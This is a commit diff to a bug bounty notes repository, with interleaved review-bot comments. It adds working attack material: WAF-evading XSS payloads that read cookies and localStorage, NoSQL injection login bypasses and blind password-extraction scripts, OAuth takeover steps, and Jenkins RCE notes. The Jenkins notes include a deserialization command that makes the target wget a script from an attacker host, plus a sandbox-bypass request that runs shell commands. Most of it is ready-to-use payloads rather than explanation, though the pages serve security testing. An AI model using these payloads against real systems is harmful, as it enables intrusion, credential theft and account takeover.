Major Update, adding some tips
parent
a71bcdd231
commit
338475aee1
|
@ -1,5 +1,11 @@
|
|||
# 403 Forbidden Bypass
|
||||
|
||||
## Tools
|
||||
|
||||
* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
|
||||
|
||||
|
||||
## Exploit
|
||||
1. Using "X-Original-URL" header
|
||||
```
|
||||
GET /admin HTTP/1.1
|
||||
|
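Review bot: the new Tools entry for `bypass-403` is a bare link with no invocation, so a reader cannot tell whether it automates the header and path tricks listed under `## Exploit` or only some of them; add a one-line usage and state which of the numbered techniques it covers. The renamed `## Exploit` heading would read better as `## Bypass techniques`, since every item is a request variant to try rather than an exploit.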
@ -21,15 +27,18 @@ Try this to bypass
|
|||
http://target.com/%2e/admin => 200
|
||||
```
|
||||
|
||||
3. Try add dot (.) and slash (/) in the URL
|
||||
3. Try add dot (.) slash (/) and semicolon (;) in the URL
|
||||
```
|
||||
http://target.com/admin => 403
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
http://target.com/admin/. => 200
|
||||
http://target.com//admin// => 200
|
||||
http://target.com/./admin/./ => 200
|
||||
http://target.com/secret/. => 200
|
||||
http://target.com//secret// => 200
|
||||
http://target.com/./secret/.. => 200
|
||||
http://target.com/;/secret => 200
|
||||
http://target.com/.;/secret => 200
|
||||
http://target.com//;//secret => 200
|
||||
```
|
||||
|
||||
4. Add "..;/" after the directory name
|
||||
|
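Review bot: the three added `;` variants (`/;/secret`, `/.;/secret`, `//;//secret`) depend on the same servlet-container path-parameter handling as item 4's `..;/` (Tomcat and Jetty strip `;...` segments when resolving the path), so they belong under one item with a note that they only apply when a front proxy and the backend normalize the path differently. The list also switches from `/admin` in the 403 example to `/secret` halfway through the bypass examples; use one path throughout. Grammar in the item title: "Try adding a dot (.), slash (/) and semicolon (;) to the URL".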
@ -58,4 +67,6 @@ Host: victim.com
|
|||
X-Original-URL: /admin
|
||||
```
|
||||
|
||||
Source: [@iam_j0ker](https://twitter.com/iam_j0ker)
|
||||
Source:
|
||||
- [@iam_j0ker](https://twitter.com/iam_j0ker)
|
||||
- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web)
|
||||
|
|
|
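Review bot: the new Hacktricks entry links the generic `pentesting/pentesting-web` page rather than the 403 bypass section within it; point at the specific section so the attribution is verifiable. The heading is `Source:` here but `Reference:` / `References:` on the other pages in this commit; pick one form for the repository.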
@ -336,5 +336,50 @@ javascript://%250Aalert(1)
|
|||
<!--><svg onload=alert(1)-->
|
||||
```
|
||||
|
||||
## Bypass WAF
|
||||
1. Cloudflare
|
||||
```
|
||||
<svg%0Aonauxclick=0;[1].some(confirm)//
|
||||
|
||||
<svg onload=alert%26%230000000040"")>
|
||||
|
||||
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
|
||||
<svg onx=() onload=(confirm)(1)>
|
||||
|
||||
<svg onx=() onload=(confirm)(document.cookie)>
|
||||
|
||||
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
|
||||
|
||||
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
||||
|
||||
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
|
||||
|
||||
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
||||
|
||||
"><onx=[] onmouseover=prompt(1)>
|
||||
|
||||
%2sscript%2ualert()%2s/script%2u -xss popup
|
||||
|
||||
<svg onload=alert%26%230000000040"1")>
|
||||
|
||||
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
|
||||
|
||||
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
|
||||
|
||||
<svg onload=prompt%26%230000000040document.domain)>
|
||||
|
||||
<svg onload=prompt%26%23x000000028;document.domain)>
|
||||
|
||||
<svg/onrandom=random onload=confirm(1)>
|
||||
|
||||
<video onnull=null onmouseover=confirm(1)>
|
||||
|
||||
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
|
||||
|
||||
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
|
||||
|
||||
<img ignored=() src=x onerror=prompt(1)>
|
||||
```
|
||||
|
||||
Reference:
|
||||
- [Brute Logic](https://brutelogic.com.br/)
|
|
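Review bot: the Cloudflare block carries duplicates and run-together entries that make it unusable as a list: `Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();` appears twice, `<svg onload=alert%26%230000000040"")>` and `<svg onload=alert%26%230000000040"1")>` differ only in the argument, and the two long lines beginning `"Onx=() onMouSeoVer=prompt(1)>` and `[1].map(confirm)'ale'+'rt'()` are many separate payloads pasted onto one line with no separator. Split those one per line, drop the exact duplicate, and move the trailing annotation `-xss popup` out of the code block. The subsection is numbered `1. Cloudflare` with no other entries; either drop the numbering or add the other WAFs the heading implies.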
@ -1,14 +1,14 @@
|
|||
# Broken Link Hijacking
|
||||
## **Introduction**
|
||||
Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page
|
||||
|
||||
## **How to Find**
|
||||
## Tools
|
||||
- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker)
|
||||
|
||||
## Definition
|
||||
Broken Link Hijacking exists whenever a target links to an expired domain or page
|
||||
|
||||
## How to find
|
||||
1. Manually find external links on the target site (For example, check some links to social media accounts)
|
||||
2. Try [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) tools to find broken link, this is the command
|
||||
|
||||
```
|
||||
blc -rof --filter-level 3 https://vuln.com/
|
||||
```
|
||||
2. Try using tools to find broken link, for example using tools that listed in this readme
|
||||
|
||||
References:
|
||||
- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)
|
||||
|
|
|
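Review bot: the rewritten step 2 (`Try using tools to find broken link, for example using tools that listed in this readme`) drops the only concrete invocation this page had, `blc -rof --filter-level 3 https://vuln.com/`; keep that command next to the `broken-link-checker` entry under Tools, otherwise the reader is sent to a README with no usage. The Definition line has no terminating period and says only that a link is expired; one clause on why that matters (the expired domain or account can be registered by someone else, which is what the edoverflow reference covers) would make the page self-contained. Grammar: "find broken link" should be "find broken links" and "tools that listed" should be "the tools listed".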
@ -0,0 +1,10 @@
|
|||
# Exposed API Keys
|
||||
|
||||
## Tools
|
||||
* [Key-Checker](https://github.com/daffainfo/Key-Checker)
|
||||
|
||||
## Definition
|
||||
Sometimes in a web application, an attacker can find some exposed API keys which can lead to financial loss to a company.
|
||||
|
||||
## How to exploit
|
||||
[keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys
|
|
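Review bot: `There is 79 list of how to check` is a hard-coded count that will be wrong as soon as keyhacks changes, and it is not grammatical; say "keyhacks lists, per service, how to check whether a leaked key is valid" and leave the count out. The Definition sentence limits the impact to financial loss; an exposed key also grants whatever access the key authorizes, which is usually the more serious finding to report. The `Key-Checker` Tools entry would benefit from a one-line statement of which services it covers.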
@ -1 +1,143 @@
|
|||
# Soon!
|
||||
## NoSQL injection
|
||||
|
||||
## Tools
|
||||
|
||||
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
|
||||
|
||||
## Exploit
|
||||
|
||||
### Authentication Bypass
|
||||
|
||||
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
||||
|
||||
```
|
||||
in the request
|
||||
- username[$ne]=toto&password[$ne]=toto
|
||||
- login[$regex]=a.*&pass[$ne]=lol
|
||||
- login[$gt]=admin&login[$lt]=test&pass[$ne]=1
|
||||
- login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
|
||||
```
|
||||
|
||||
```json
|
||||
The output is
|
||||
{"username": {"$ne": null}, "password": {"$ne": null}}
|
||||
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
|
||||
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
|
||||
{"username": {"$gt":""}, "password": {"$gt":""}}
|
||||
```
|
||||
|
||||
### Extract length information
|
||||
|
||||
```json
|
||||
username[$ne]=toto&password[$regex]=.{1}
|
||||
username[$ne]=toto&password[$regex]=.{3}
|
||||
```
|
||||
|
||||
### Extract data information
|
||||
|
||||
```json
|
||||
in URL
|
||||
username[$ne]=toto&password[$regex]=m.{2}
|
||||
username[$ne]=toto&password[$regex]=md.{1}
|
||||
username[$ne]=toto&password[$regex]=mdp
|
||||
|
||||
username[$ne]=toto&password[$regex]=m.*
|
||||
username[$ne]=toto&password[$regex]=md.*
|
||||
|
||||
in JSON
|
||||
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
|
||||
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
|
||||
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
|
||||
```
|
||||
|
||||
### Extract data with "in"
|
||||
|
||||
```json
|
||||
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
|
||||
```
|
||||
|
||||
### PHP Arbitrary Function Execution
|
||||
```json
|
||||
"user":{"$func": "var_dump"}
|
||||
```
|
||||
|
||||
## Blind NoSQL
|
||||
|
||||
### POST
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
import string
|
||||
import urllib
|
||||
urllib3.disable_warnings()
|
||||
|
||||
username="admin"
|
||||
password=""
|
||||
u="http://example.org/login"
|
||||
headers={'content-type': 'application/json'}
|
||||
|
||||
while True:
|
||||
for c in string.printable:
|
||||
if c not in ['*','+','.','?','|']:
|
||||
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
|
||||
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
|
||||
if 'OK' in r.text or r.status_code == 302:
|
||||
print("Found one more char : %s" % (password+c))
|
||||
password += c
|
||||
```
|
||||
|
||||
### GET
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
import string
|
||||
import urllib
|
||||
urllib3.disable_warnings()
|
||||
|
||||
username='admin'
|
||||
password=''
|
||||
u='http://example.org/login'
|
||||
|
||||
while True:
|
||||
for c in string.printable:
|
||||
if c not in ['*','+','.','?','|', '#', '&', '$']:
|
||||
payload='?username=%s&password[$regex]=^%s' % (username, password + c)
|
||||
r = requests.get(u + payload)
|
||||
if 'Yeah' in r.text:
|
||||
print("Found one more char : %s" % (password+c))
|
||||
password += c
|
||||
```
|
||||
|
||||
Another example using sleep to check vuln or not
|
||||
```
|
||||
'%2bsleep(1)%2b'
|
||||
```
|
||||
|
||||
### MongoDB Payloads
|
||||
|
||||
```bash
|
||||
true, $where: '1 == 1'
|
||||
, $where: '1 == 1'
|
||||
$where: '1 == 1'
|
||||
', $where: '1 == 1'
|
||||
1, $where: '1 == 1'
|
||||
{ $ne: 1 }
|
||||
', $or: [ {}, { 'a':'a
|
||||
' } ], $comment:'successful MongoDB injection'
|
||||
db.injection.insert({success:1});
|
||||
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|
||||
|| 1==1
|
||||
' && this.password.match(/.*/)//+%00
|
||||
' && this.passwordzz.match(/.*/)//+%00
|
||||
'%20%26%26%20this.password.match(/.*/)//+%00
|
||||
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
|
||||
{$gt: ''}
|
||||
[$ne]=1
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [Hacktricks](https://book.hacktricks.xyz/pentesting-web/nosql-injection)
|
||||
* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/NoSQL%20Injection/README.md)
|
|
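Review bot: both blind-extraction scripts (the POST and GET variants) never terminate: `while True:` only ever appends characters, so once no candidate matches (the full password has been recovered, or the target is not vulnerable) the loop spins forever re-sending the same requests. Track whether a pass found a character and `break` when it did not. The exclusion list `['*','+','.','?','|']` also misses `^`, `$`, `(`, `)`, `[`, `]`, `{`, `}` and `\`, any of which makes the regex invalid or changes its meaning; escape candidate characters with `re.escape` rather than skipping them. Smaller points: `import urllib` is unused in both scripts; the fences tagged json under "Authentication Bypass", "Extract length information" and "Extract data information" contain query strings and prose lines such as `in URL` and `The output is`, so they should be plain fences with the prose outside; `"user":{"$func": "var_dump"}` is a fragment, not valid JSON; and the top heading is `## NoSQL injection` while sibling pages use a single `#`.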
@ -0,0 +1,13 @@
|
|||
# OAuth Misconfiguration
|
||||
1. OAuth token stealing: Changing redirect_uri to attacker(.)com(Use IDN Homograph or common bypasses).
|
||||
2. Change Referral header to attacker(.)com while requesting OAuth.
|
||||
3. Create an account with victim@gmail(.)com with normal functionality. Create account with victim@gmail(.)com using OAuth functionality. Now try to login using previous credentials.
|
||||
4. OAuth Token Re-use.
|
||||
5. Missing or broken state parameter.
|
||||
6. Lack of origin check.
|
||||
7. Open Redirection on another endpoint > Use it in redirect_uri
|
||||
8. If there is an email parameter after signin then try to change the email parameter to victim's one.
|
||||
9. Try to remove email from the scope and add victim's email manually.
|
||||
10. Only company's email is allowed? > Try to replace hd=company(.)com to hd=gmail(.)com
|
||||
11. Check if its leaking client_secret parameter.
|
||||
12. Go to the browser history and check if the token is there.
|
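Review bot: item 2 says `Referral header`; the HTTP header is `Referer` (misspelled in the specification itself), and a reader searching for "Referral" in a proxy will not find it. Item 3 runs three steps into one sentence; splitting it into a sub-list would make the pre-registration account-takeover sequence clearer. Item 1's "(Use IDN Homograph or common bypasses)" names no concrete bypass; either list the `redirect_uri` variations meant or link a reference. Unlike the other new pages, this one has no Tools, Definition or Reference section.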
24
README.md
|
@ -1,18 +1,24 @@
|
|||
# All about bug bounty
|
||||
These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!
|
||||
|
||||
![](https://img.shields.io/github/issues/daffainfo/AllAboutBugBounty)
|
||||
![](https://img.shields.io/github/forks/daffainfo/AllAboutBugBounty)
|
||||
![](https://img.shields.io/github/stars/daffainfo/AllAboutBugBounty)
|
||||
![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty)
|
||||
|
||||
## List
|
||||
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
|
||||
- SQL Injection (SOON)
|
||||
- NoSQL Injection (SOON)
|
||||
- Local File Inclusion (SOON)
|
||||
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
|
||||
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
|
||||
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
||||
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
|
||||
- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
|
||||
- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md)
|
||||
- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
|
||||
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
|
||||
- Local File Inclusion (SOON)
|
||||
- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
|
||||
- SQL Injection (SOON)
|
||||
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
|
||||
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
||||
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
|
||||
|
||||
## List Bypass
|
||||
|
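Review bot: the reordered list is alphabetical except for `SQL Injection (SOON)`, which now sits between `NoSQL Injection` and `OAuth Misconfiguration`; alphabetically it belongs after `Open Redirect`. Also, none of the visible README hunks link the `Exposed API Keys.md` page this commit adds, so it is unreachable from the index.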
@ -28,7 +34,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||
|
||||
## List Framework
|
||||
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
|
||||
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD)
|
||||
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.md)
|
||||
|
||||
## Miscellaneous
|
||||
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
||||
|
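Review bot: the link target changes from `Zend.MD` to `Zend.md`, a case-only difference. GitHub URLs are case-sensitive, so this only fixes the link if the file itself was renamed in the same commit; no file header for `Framework/Zend.md` appears in this diff, so confirm the rename (on a case-insensitive filesystem it takes two `git mv` steps through a temporary name).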
@ -38,7 +44,11 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||
- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md)
|
||||
- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
|
||||
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
|
||||
- [Unauthenticated Jira CVE](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
|
||||
|
||||
## Technologies
|
||||
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
||||
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
||||
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
||||
|
||||
## Reconnaissance
|
||||
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
|
||||
|
|
|
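Review bot: the new Technologies section lists `Jira`, `Jenkins`, `Moodle` in that order, while the rest of the README is alphabetical (Jenkins should precede Jira). The `Unauthenticated Jira CVE` entry kept under Miscellaneous now overlaps with the Technologies `Jira` page; fold it into that page or cross-link the two.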
@ -0,0 +1,66 @@
|
|||
## Jenkins
|
||||
1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
|
||||
|
||||
Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload.
|
||||
Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py):
|
||||
|
||||
```bash
|
||||
java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.sh' > payload.out
|
||||
./jenkins_rce.py jenkins_ip jenkins_port payload.out
|
||||
```
|
||||
|
||||
2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
|
||||
|
||||
Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
|
||||
|
||||
If the Jenkins requests authentication but returns valid data using the following request, it is vulnerable:
|
||||
```bash
|
||||
curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a
|
||||
```
|
||||
|
||||
3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002)
|
||||
|
||||
Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce).
|
||||
|
||||
Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc).
|
||||
|
||||
4. CVE-2019-1003030
|
||||
|
||||
How to Exploit:
|
||||
- [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html)
|
||||
|
||||
```
|
||||
GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {
|
||||
public x(){
|
||||
"ping -c 1 xx.xx.xx.xx".execute()
|
||||
}
|
||||
} HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
```
|
||||
URL Encoding the following for RCE
|
||||
```
|
||||
public class x {
|
||||
public x(){
|
||||
"ping -c 1 xx.xx.xx.xx".execute()
|
||||
}
|
||||
}
|
||||
```
|
||||
to
|
||||
|
||||
%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
|
||||
|
||||
5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392)
|
||||
|
||||
How to exploit:
|
||||
- [@jas502n](https://github.com/jas502n/CVE-2019-10392)
|
||||
- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html)
|
||||
|
||||
Reference:
|
||||
- https://github.com/gquere/pwn_jenkins
|
|
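Review bot: the item 4 request was pasted from a live capture: `Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0` is a real session identifier and `/jenkinselj/` is an instance-specific context path; replace both with placeholders (the Jira page's `<JIRA_URL>` style) so readers do not copy a stale cookie into their own requests. Item 4 also has only a CVE number for a title where items 1, 2, 3 and 5 state the bug class and affected versions. The step 1 link `./rce/jenkins_rce_cve-2015-8103_deser.py` is a relative path, but no such file is part of this commit, so it will 404 unless it already exists in the repository; the `./jenkins_rce.py` name in the command does not match it either. The top heading is `## Jenkins` whereas `Moodle.md` opens with `# Moodle`.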
@ -60,3 +60,6 @@ Connection: close
|
|||
```
|
||||
https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
|
||||
```
|
||||
|
||||
Reference:
|
||||
- https://twitter.com/harshbothra
|
|
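Review bot: the new reference is a bare Twitter profile URL (`https://twitter.com/harshbothra`) rather than the specific post describing the `ConfigurePortalPages!default.jspa` XSS, and it does not use the `- [@handle](url)` link form the 403 page's Source list uses; link the post itself and note the affected Jira version next to the payload as the Jenkins entries do.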
@ -0,0 +1,12 @@
|
|||
# Moodle
|
||||
|
||||
1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter
|
||||
```
|
||||
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
|
||||
```
|
||||
|
||||
2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter
|
||||
|
||||
```
|
||||
https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
|
||||
```
|
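Review bot: both headings name the parameter `redirect_url` but both example URLs use `redirect_uri`; one of them is wrong and the reader has to guess which. Item 2 also uses a real university hostname, `classroom.its.ac.id`, where item 1 uses `target.com`; use the same placeholder in both so a live third-party instance is not named as an example target. Neither item states an affected Moodle version or advisory identifier, which the Jenkins page in this same commit does for each entry.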